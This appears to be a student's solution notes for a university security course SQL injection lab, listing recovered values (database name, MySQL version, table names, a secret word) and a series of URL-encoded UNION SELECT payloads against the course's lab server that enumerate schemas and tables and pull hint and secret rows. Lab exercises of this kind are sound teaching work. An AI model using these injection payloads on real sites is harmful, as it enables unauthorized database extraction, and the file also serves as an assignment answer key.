proj2_inject3
5.5.60-0ubuntu0.14.04.1
HINT,SECRET, foo, inject3_users
malleus


http://bungle-cs461.cs.illinois.edu/sqlinject3/?id=3%27+UNION+SELECT+1%2C2%2C3%2CSCHEMA_NAME+from+information_schema.SCHEMATA+limit+2%2C1%3B+--+



http://bungle-cs461.cs.illinois.edu/sqlinject3/?id=1%27+UNION+SELECT+3%2C1%2C+3%2Cversion%28%29+limit+1%2C1+--+


http://bungle-cs461.cs.illinois.edu/sqlinject3/?id=1%27+UNION+SELECT+1%2C2%2C3%2CTABLE_NAME+FROM+information_schema.TABLES+where+table_schema%3D%27proj2_inject3%27+limit+1%2C1%3B+--+


http://bungle-cs461.cs.illinois.edu/sqlinject3/?id=1%27+UNION+SELECT+1%2C2%2C3%2CTABLE_NAME+FROM+information_schema.TABLES+where+table_schema%3D%27proj2_inject3%27+limit+2%2C1%3B+--+


http://bungle-cs461.cs.illinois.edu/sqlinject3/?id=1%27+UNION+SELECT+1%2C2%2C3%2CTABLE_NAME+FROM+information_schema.TABLES+where+table_schema%3D%27proj2_inject3%27+limit+3%2C1%3B+--+

http://bungle-cs461.cs.illinois.edu/sqlinject3/?id=1%27+UNION+SELECT+1%2C2%2C3%2CTABLE_NAME+FROM+information_schema.TABLES+where+table_schema%3D%27proj2_inject3%27+limit+4%2C1%3B+--+


http://bungle-cs461.cs.illinois.edu/sqlinject3/?id=1%27+UNION+SELECT+1%2C2%2C3%2C+message+FROM+HINT+limit+1%2C1%3B+--+

http://bungle-cs461.cs.illinois.edu/sqlinject3/?id=1%27+UNION+SELECT+1%2C2%2C3%2C+secret+from+SECRET+where+hash%3D%272AB8CE5740CD26A4498A47899162E706%27+limit+1%2C1%3B+--++





